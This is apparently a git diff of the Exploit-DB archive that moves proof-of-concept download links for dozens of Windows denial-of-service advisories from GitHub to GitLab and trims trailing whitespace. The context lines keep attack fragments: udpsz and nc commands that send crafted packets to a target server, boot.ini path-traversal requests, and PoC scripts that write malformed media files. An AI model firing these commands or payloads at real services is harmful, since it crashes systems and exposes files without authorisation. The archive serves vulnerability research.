157f5b5c4..444213220 100644 --- a/exploits/windows/dos/17930.txt +++ b/exploits/windows/dos/17930.txt @@ -91,7 +91,7 @@ Stack overflow in the handling of the USE command of the CYB files. http://aluigi.org/poc/cytel_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17930.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17930.zip ####################################################################### diff --git a/exploits/windows/dos/17931.txt b/exploits/windows/dos/17931.txt index cbdb9186e..04c29e199 100644 --- a/exploits/windows/dos/17931.txt +++ b/exploits/windows/dos/17931.txt @@ -119,7 +119,7 @@ consequent freeing of arbitrary memory (write4): http://aluigi.org/poc/genstat_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17931.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17931.zip A] modified 32bit field at offset 0x46 B] modified 32bit field at offset 0x302 and added 'a's diff --git a/exploits/windows/dos/17963.txt b/exploits/windows/dos/17963.txt index cb6c0cf4b..7fabecd64 100644 --- a/exploits/windows/dos/17963.txt +++ b/exploits/windows/dos/17963.txt @@ -108,10 +108,10 @@ particular negative Content-Length. http://aluigi.org/mytoolz/mydown.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17963-1.zip http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17963-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17963-2.zip A] mydown http://SERVER/..\..\..\..\..\..\..\boot.ini diff --git a/exploits/windows/dos/17964.txt b/exploits/windows/dos/17964.txt index ccd504069..4b3e8ef8b 100644 --- a/exploits/windows/dos/17964.txt +++ b/exploits/windows/dos/17964.txt @@ -74,7 +74,7 @@ execution: http://aluigi.org/poc/automgen_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17964.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17964.zip ####################################################################### diff --git a/exploits/windows/dos/17965.txt b/exploits/windows/dos/17965.txt index 46689560b..09f7cfd1b 100644 --- a/exploits/windows/dos/17965.txt +++ b/exploits/windows/dos/17965.txt @@ -58,7 +58,7 @@ No additional research performed. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17965.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17965.zip udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80 diff --git a/exploits/windows/dos/17978.txt b/exploits/windows/dos/17978.txt index 2da6e98d8..e0211c615 100644 --- a/exploits/windows/dos/17978.txt +++ b/exploits/windows/dos/17978.txt @@ -9,7 +9,7 @@ Exploit is downloadable from: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17978.tar.gz (my.fon.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17978.tar.gz (my.fon.tar.gz) http://exploitshop.wordpress.com/2011/10/12/ms11-077-vulnerabilities-in-windows-kernel-mode-drivers-could-allow-remote-code-execution-2567053/ diff --git a/exploits/windows/dos/18049.txt b/exploits/windows/dos/18049.txt index 319be05ef..d22aea6da 100644 --- a/exploits/windows/dos/18049.txt +++ b/exploits/windows/dos/18049.txt @@ -60,7 +60,7 @@ for being executed. http://aluigi.org/poc/promotic_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18049.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18049.zip ####################################################################### diff --git a/exploits/windows/dos/18078.txt b/exploits/windows/dos/18078.txt index 163539d72..5699d6b59 100644 --- a/exploits/windows/dos/18078.txt +++ b/exploits/windows/dos/18078.txt @@ -94,7 +94,7 @@ excel_1b.xls: http://aluigi.org/poc/excel_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18078.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18078.zip ####################################################################### diff --git a/exploits/windows/dos/18112.txt b/exploits/windows/dos/18112.txt index 1fdd5c1ec..3497f2ca6 100644 --- a/exploits/windows/dos/18112.txt +++ b/exploits/windows/dos/18112.txt @@ -80,7 +80,7 @@ Endless loop with CPU at 100% caused by incomplete packets: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18112.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip A] udpsz -C "e803 0400 ff" -T -D -3 -d SERVER 10260 0x107 diff --git a/exploits/windows/dos/18165.txt b/exploits/windows/dos/18165.txt index 4e2b5a13c..4535ca31d 100644 --- a/exploits/windows/dos/18165.txt +++ b/exploits/windows/dos/18165.txt @@ -115,7 +115,7 @@ has more experience than me with this component can confirm it or not. http://aluigi.org/poc/almsrvx_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18165.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18165.zip A] almsrvx_1 almsrvx_1a.dat SERVER diff --git a/exploits/windows/dos/18166.txt b/exploits/windows/dos/18166.txt index fbe1cd9db..eaf978b81 100644 --- a/exploits/windows/dos/18166.txt +++ b/exploits/windows/dos/18166.txt @@ -194,7 +194,7 @@ number or on the sum of both: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18166-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18166-1.zip A] udpsz -C "0004 02 00 00 00 ffffffff" -b a -T SERVER 2308 2+0x400 @@ -214,7 +214,7 @@ C] D] http://aluigi.org/mytoolz/mydown.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18166-2.zip + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18166-2.zip mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini E] diff --git a/exploits/windows/dos/18196.py b/exploits/windows/dos/18196.py index 3396724bc..4b5dd4902 100755 --- a/exploits/windows/dos/18196.py +++ b/exploits/windows/dos/18196.py @@ -60,8 +60,4 @@ try: connectionx.close() except socket.error: print "it couldn't connect" - time.sleep(2) - - - - + time.sleep(2) \ No newline at end of file diff --git a/exploits/windows/dos/18256.txt b/exploits/windows/dos/18256.txt index 7d21c5ff7..4309a9f91 100644 --- a/exploits/windows/dos/18256.txt +++ b/exploits/windows/dos/18256.txt @@ -63,5 +63,5 @@ NULL after freeing them, which can be exploited to cause a double-free condition ============= 4) The Code ============= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18256.fpx +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18256.fpx http://www.protekresearchlab.com/exploits/PRL-2011-11.fpx \ No newline at end of file diff --git a/exploits/windows/dos/18257.txt b/exploits/windows/dos/18257.txt index 3e883b1a1..abab8eedb 100644 --- a/exploits/windows/dos/18257.txt +++ b/exploits/windows/dos/18257.txt @@ -66,5 +66,5 @@ image file. 4) The Code ============= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18257.tif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18257.tif http://www.protekresearchlab.com/exploits/PRL-2011-10.tif \ No newline at end of file diff --git a/exploits/windows/dos/18461.html b/exploits/windows/dos/18461.html index 73f3ad64d..5a868883d 100644 --- a/exploits/windows/dos/18461.html +++ b/exploits/windows/dos/18461.html @@ -19,5 +19,4 @@ arg1=String(3092, "A") target.LicenseName = arg1 - - + \ No newline at end of file diff --git a/exploits/windows/dos/18481.py b/exploits/windows/dos/18481.py index 77b40cb59..8929c7d07 100755 --- a/exploits/windows/dos/18481.py +++ b/exploits/windows/dos/18481.py @@ -14,5 +14,4 @@ payload = (header+junk) f = open("Exploit.m3u","wb") f.write(payload) -f.close() - +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/18488.txt b/exploits/windows/dos/18488.txt index aeb62f83d..13785a4d5 100644 --- a/exploits/windows/dos/18488.txt +++ b/exploits/windows/dos/18488.txt @@ -76,7 +76,7 @@ to change the NM_A_PARM1 field if you want to use another one. http://aluigi.org/poc/nmma_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18488.zip (nmma_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18488.zip (nmma_x.zip) nmma_x 3 SERVER diff --git a/exploits/windows/dos/18489.txt b/exploits/windows/dos/18489.txt index 66b40e964..981f9a5e1 100644 --- a/exploits/windows/dos/18489.txt +++ b/exploits/windows/dos/18489.txt @@ -72,7 +72,7 @@ service is multi-thread) may be possible to control the corruption. http://aluigi.org/poc/nmma_x.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18489.zip (nmma_x.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18489.zip (nmma_x.zip) nmma_x 1 SERVER diff --git a/exploits/windows/dos/18490.txt b/exploits/windows/dos/18490.txt index d21fd093b..fc74e2763 100644 --- a/exploits/windows/dos/18490.txt +++ b/exploits/windows/dos/18490.txt @@ -67,7 +67,7 @@ after having replaced the "SERVER" string with the name of the server where is located the nim_1.nmx file: http://aluigi.org/poc/nim_1.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18490.zip + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18490.zip ####################################################################### diff --git a/exploits/windows/dos/18491.txt b/exploits/windows/dos/18491.txt index f199a6ca2..825a01d42 100644 --- a/exploits/windows/dos/18491.txt +++ b/exploits/windows/dos/18491.txt @@ -195,7 +195,7 @@ Heap overflow in the handling of the frames in the FLI files. http://aluigi.org/poc/xnview_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18491.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18491.zip ####################################################################### diff --git a/exploits/windows/dos/18512.txt b/exploits/windows/dos/18512.txt index 90df0f75e..102344572 100644 --- a/exploits/windows/dos/18512.txt +++ b/exploits/windows/dos/18512.txt @@ -57,7 +57,7 @@ and, (tested on Firefox) EIP pointing to an invalid memory zone. http://aluigi.org/poc/unity3d_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18512.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18512.zip ####################################################################### diff --git a/exploits/windows/dos/18586.txt b/exploits/windows/dos/18586.txt index e65f86f34..81d0af884 100644 --- a/exploits/windows/dos/18586.txt +++ b/exploits/windows/dos/18586.txt @@ -58,4 +58,4 @@ an heap-based buffer overflow by tricking a user into opening a specially crafte =========== Here: http://www.protekresearchlab.com/exploits/PRL-2012-06.fpx -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18586.pfx (PRL-2012-06.fpx) \ No newline at end of file +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18586.pfx (PRL-2012-06.fpx) \ No newline at end of file diff --git a/exploits/windows/dos/18602.txt b/exploits/windows/dos/18602.txt index d1655ab7e..92332cf0c 100644 --- a/exploits/windows/dos/18602.txt +++ b/exploits/windows/dos/18602.txt @@ -74,7 +74,7 @@ it's longer than that size and starts with "1.": http://aluigi.org/poc/eeventmanager_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18602.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18602.dat nc SERVER 2968 < eeventmanager_1.dat diff --git a/exploits/windows/dos/18606.txt b/exploits/windows/dos/18606.txt index 0cb72e9db..52f9e797e 100644 --- a/exploits/windows/dos/18606.txt +++ b/exploits/windows/dos/18606.txt @@ -172,7 +172,7 @@ http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx http://aluigi.org/poc/termdd_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18606.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18606.dat nc SERVER 3389 < termdd_1.dat diff --git a/exploits/windows/dos/18633.txt b/exploits/windows/dos/18633.txt index 34493b1af..8e2e45919 100644 --- a/exploits/windows/dos/18633.txt +++ b/exploits/windows/dos/18633.txt @@ -91,4 +91,4 @@ a use-after-free by e.g. tricking a user into opening a specially crafted file. =========== http://www.protekresearchlab.com/exploits/PRL-2012-07.tif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18633.tif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18633.tif \ No newline at end of file diff --git a/exploits/windows/dos/18661.txt b/exploits/windows/dos/18661.txt index 9e4e3e3d5..526829c7b 100644 --- a/exploits/windows/dos/18661.txt +++ b/exploits/windows/dos/18661.txt @@ -194,4 +194,4 @@ PoC = ("\x00\x00\x00\x1C\x66\x74\x79\x70\x6D\x70\x34\x32\x00\x00\x00\x00\x69\x73 payload = (PoC) f = open("PoC.mp4","wb") f.write(payload) -f.close() +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/18739.txt b/exploits/windows/dos/18739.txt index 1966ac50a..ece7158b9 100644 --- a/exploits/windows/dos/18739.txt +++ b/exploits/windows/dos/18739.txt @@ -62,7 +62,7 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft 4) The PoC ============= -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18739.fpx +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18739.fpx ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/18765.txt b/exploits/windows/dos/18765.txt index 3b67c4c22..46fb5365d 100644 --- a/exploits/windows/dos/18765.txt +++ b/exploits/windows/dos/18765.txt @@ -87,7 +87,7 @@ Stack overflow in the BackupToAvi method used by the ActiveX components A] http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18765-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18765-1.zip NiwMasterService: udpsz -b 0x80 -T SERVER 4505 0x28 diff --git a/exploits/windows/dos/18771.txt b/exploits/windows/dos/18771.txt index 1cb30e15e..b0e7a5338 100644 --- a/exploits/windows/dos/18771.txt +++ b/exploits/windows/dos/18771.txt @@ -24,7 +24,7 @@ Hash: SHA1 Proof of concept: http://shinnai.altervista.org/exploits/sumatra.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18771.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18771.rar ============================================================================= ============================================================================= diff --git a/exploits/windows/dos/18774.txt b/exploits/windows/dos/18774.txt index bafecab0f..0766a1a5d 100644 --- a/exploits/windows/dos/18774.txt +++ b/exploits/windows/dos/18774.txt @@ -70,7 +70,7 @@ Hash: SHA1 at 0x0012F6E8 PoC: http://shinnai.altervista.org/exploits/mobi.rar - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18774.rar + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18774.rar ============================================================================= ============================================================================= diff --git a/exploits/windows/dos/18776.txt b/exploits/windows/dos/18776.txt index af5c7cec6..3b1600ee7 100644 --- a/exploits/windows/dos/18776.txt +++ b/exploits/windows/dos/18776.txt @@ -35,7 +35,7 @@ Hash: SHA1 Crafting a .chm file is possible to cause a stack based buffer overflow. PoC: http://shinnai.altervista.org/exploits/chm.rar - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18776.rar + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18776.rar ============================================================================= ============================================================================= diff --git a/exploits/windows/dos/18795.py b/exploits/windows/dos/18795.py index 63a9fe822..1bb4f8823 100755 --- a/exploits/windows/dos/18795.py +++ b/exploits/windows/dos/18795.py @@ -33,5 +33,4 @@ Data = ("\x00\x00\x00\x1c\x66\x74\x79\x70\x6d\x70\x34\x32\x00\x00\x00\x00\x69\x7 avi = open('poc.mp4', 'wb+') avi.write(Data) -avi.close() - +avi.close() \ No newline at end of file diff --git a/exploits/windows/dos/18864.txt b/exploits/windows/dos/18864.txt index 334bc2559..67c064354 100644 --- a/exploits/windows/dos/18864.txt +++ b/exploits/windows/dos/18864.txt @@ -82,7 +82,7 @@ advisory must be considered only a case study and nothing more. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18864.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18864.zip A] diff --git a/exploits/windows/dos/18878.txt b/exploits/windows/dos/18878.txt index bed12e70b..bb13e5264 100644 --- a/exploits/windows/dos/18878.txt +++ b/exploits/windows/dos/18878.txt @@ -178,7 +178,7 @@ with the protocol running on the UDP one (type, flags, size, data). http://aluigi.org/poc/proservrex_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18878.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18878.zip ####################################################################### diff --git a/exploits/windows/dos/18894.txt b/exploits/windows/dos/18894.txt index 30489a7e6..5a43de02f 100644 --- a/exploits/windows/dos/18894.txt +++ b/exploits/windows/dos/18894.txt @@ -123,4 +123,4 @@ Description POC === -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18894.zip \ No newline at end of file diff --git a/exploits/windows/dos/18952.txt b/exploits/windows/dos/18952.txt index b3c6de080..afddae979 100644 --- a/exploits/windows/dos/18952.txt +++ b/exploits/windows/dos/18952.txt @@ -48,4 +48,4 @@ $ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3 $ Below You should see link to attachement with PoC: http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18952.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar \ No newline at end of file diff --git a/exploits/windows/dos/18964.txt b/exploits/windows/dos/18964.txt index 1c50c99d0..fe87f8781 100644 --- a/exploits/windows/dos/18964.txt +++ b/exploits/windows/dos/18964.txt @@ -65,4 +65,4 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft ============= http://protekresearchlab.com/exploits/PRL-2012-10.ecw -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18964.ecw \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18964.ecw \ No newline at end of file diff --git a/exploits/windows/dos/18972.txt b/exploits/windows/dos/18972.txt index e6a7119d8..6ec351811 100644 --- a/exploits/windows/dos/18972.txt +++ b/exploits/windows/dos/18972.txt @@ -54,4 +54,4 @@ and can be exploited to cause a stack-based buffer overflow via a specially craf ============= http://protekresearchlab.com/exploits/PRL-2012-11.ttf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18972.ttf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18972.ttf \ No newline at end of file diff --git a/exploits/windows/dos/19089.txt b/exploits/windows/dos/19089.txt index e1034f3df..7d3920f93 100644 --- a/exploits/windows/dos/19089.txt +++ b/exploits/windows/dos/19089.txt @@ -44,4 +44,4 @@ More detailed vulnerability analysis can be found at http://blog.cr4.sh/2012/06/ POC ==== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19089.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19089.rar \ No newline at end of file diff --git a/exploits/windows/dos/19181.txt b/exploits/windows/dos/19181.txt index 8d9aaf542..8aaf3e786 100644 --- a/exploits/windows/dos/19181.txt +++ b/exploits/windows/dos/19181.txt @@ -59,4 +59,4 @@ to cause a heap-based buffer overflow via a specially crafted "Depth" value in a =========== http://www.protekresearchlab.com/exploits/PRL-2012-14.ras -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19181.ras \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19181.ras \ No newline at end of file diff --git a/exploits/windows/dos/19182.txt b/exploits/windows/dos/19182.txt index 1973c272a..d2013fff9 100644 --- a/exploits/windows/dos/19182.txt +++ b/exploits/windows/dos/19182.txt @@ -60,4 +60,4 @@ overflow via a specially crafted ECW file. =========== http://www.protekresearchlab.com/exploits/PRL-2012-13.ecw -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19182.ecw \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19182.ecw \ No newline at end of file diff --git a/exploits/windows/dos/19183.txt b/exploits/windows/dos/19183.txt index 2882ad7f6..7cc3f0b90 100644 --- a/exploits/windows/dos/19183.txt +++ b/exploits/windows/dos/19183.txt @@ -59,4 +59,4 @@ exploited to cause a heap-based buffer overflow via a specially crafted FPX file =========== http://www.protekresearchlab.com/exploits/PRL-2012-12.fpx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19183.fpx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19183.fpx \ No newline at end of file diff --git a/exploits/windows/dos/19289.txt b/exploits/windows/dos/19289.txt index ca39eac6f..5d3764348 100644 --- a/exploits/windows/dos/19289.txt +++ b/exploits/windows/dos/19289.txt @@ -63,7 +63,7 @@ The vulnerability is located in the lupin3 (libpin3) library. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19289.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19289.zip udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1 or diff --git a/exploits/windows/dos/19331.txt b/exploits/windows/dos/19331.txt index 95b4eb465..3cb1d52c3 100644 --- a/exploits/windows/dos/19331.txt +++ b/exploits/windows/dos/19331.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may 4) The Code =========== http://protekresearchlab.com/exploits/PRL-2012-22.rle -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19331.rle \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19331.rle \ No newline at end of file diff --git a/exploits/windows/dos/19332.txt b/exploits/windows/dos/19332.txt index dffe1f3f5..967477cb0 100644 --- a/exploits/windows/dos/19332.txt +++ b/exploits/windows/dos/19332.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-21.pct -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19332.pct \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19332.pct \ No newline at end of file diff --git a/exploits/windows/dos/19333.txt b/exploits/windows/dos/19333.txt index ee4e8cba9..b10b77bcc 100644 --- a/exploits/windows/dos/19333.txt +++ b/exploits/windows/dos/19333.txt @@ -63,4 +63,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-20.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19333.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19333.gif \ No newline at end of file diff --git a/exploits/windows/dos/19334.txt b/exploits/windows/dos/19334.txt index 71cb19f50..808eaa0ec 100644 --- a/exploits/windows/dos/19334.txt +++ b/exploits/windows/dos/19334.txt @@ -63,4 +63,4 @@ The vulnerabilities are confirmed in version 5.1 (Build 137). Other versions may =========== http://protekresearchlab.com/exploits/PRL-2012-19.cur -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19334.cur \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19334.cur \ No newline at end of file diff --git a/exploits/windows/dos/19335.txt b/exploits/windows/dos/19335.txt index 59bde8457..7e7fc0dee 100644 --- a/exploits/windows/dos/19335.txt +++ b/exploits/windows/dos/19335.txt @@ -61,4 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-18.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19335.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19335.gif \ No newline at end of file diff --git a/exploits/windows/dos/19336.txt b/exploits/windows/dos/19336.txt index c424f3229..7d898c556 100644 --- a/exploits/windows/dos/19336.txt +++ b/exploits/windows/dos/19336.txt @@ -61,4 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-17.pct -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19336.pct \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19336.pct \ No newline at end of file diff --git a/exploits/windows/dos/19337.txt b/exploits/windows/dos/19337.txt index 9534b8f61..b96f0d61d 100644 --- a/exploits/windows/dos/19337.txt +++ b/exploits/windows/dos/19337.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-16.tiff -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19337.tiff \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19337.tiff \ No newline at end of file diff --git a/exploits/windows/dos/19338.txt b/exploits/windows/dos/19338.txt index 6a1c278d0..7c911e21c 100644 --- a/exploits/windows/dos/19338.txt +++ b/exploits/windows/dos/19338.txt @@ -61,4 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-15.tif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19338.tif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19338.tif \ No newline at end of file diff --git a/exploits/windows/dos/19385.txt b/exploits/windows/dos/19385.txt index 61f6c0a3f..b6023463c 100644 --- a/exploits/windows/dos/19385.txt +++ b/exploits/windows/dos/19385.txt @@ -55,4 +55,4 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft ============= http://protekresearchlab.com/exploits/PRL-2012-23.djvu -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19385.djvu \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19385.djvu \ No newline at end of file diff --git a/exploits/windows/dos/19409.txt b/exploits/windows/dos/19409.txt index 1f3245c03..01467c828 100644 --- a/exploits/windows/dos/19409.txt +++ b/exploits/windows/dos/19409.txt @@ -158,7 +158,7 @@ the specified size to reallocate is negative or unallocable: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19409.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19409.zip A] udpsz -b a -T -C 15 0x14 -C "e6563600 e6563600" 0x15 SERVER 46824 0x119 diff --git a/exploits/windows/dos/19445.txt b/exploits/windows/dos/19445.txt index 202a8e8e3..535f5a5f8 100644 --- a/exploits/windows/dos/19445.txt +++ b/exploits/windows/dos/19445.txt @@ -18,4 +18,4 @@ Stack dump: 00000000 00000000 00000000 00000000 00000000 00000000 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19445.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19445.zip \ No newline at end of file diff --git a/exploits/windows/dos/19456.txt b/exploits/windows/dos/19456.txt index 5cfe3ff0c..f79543da0 100644 --- a/exploits/windows/dos/19456.txt +++ b/exploits/windows/dos/19456.txt @@ -79,7 +79,7 @@ Service. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19456.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19456.zip udpsz -T -b 0x41 -C "11 00" SERVER 1804 100 diff --git a/exploits/windows/dos/19483.txt b/exploits/windows/dos/19483.txt index a99e926b4..458d42226 100644 --- a/exploits/windows/dos/19483.txt +++ b/exploits/windows/dos/19483.txt @@ -20,7 +20,7 @@ html POC file posted at: http://www.reactionpenetrationtesting.co.uk/vuln.jls 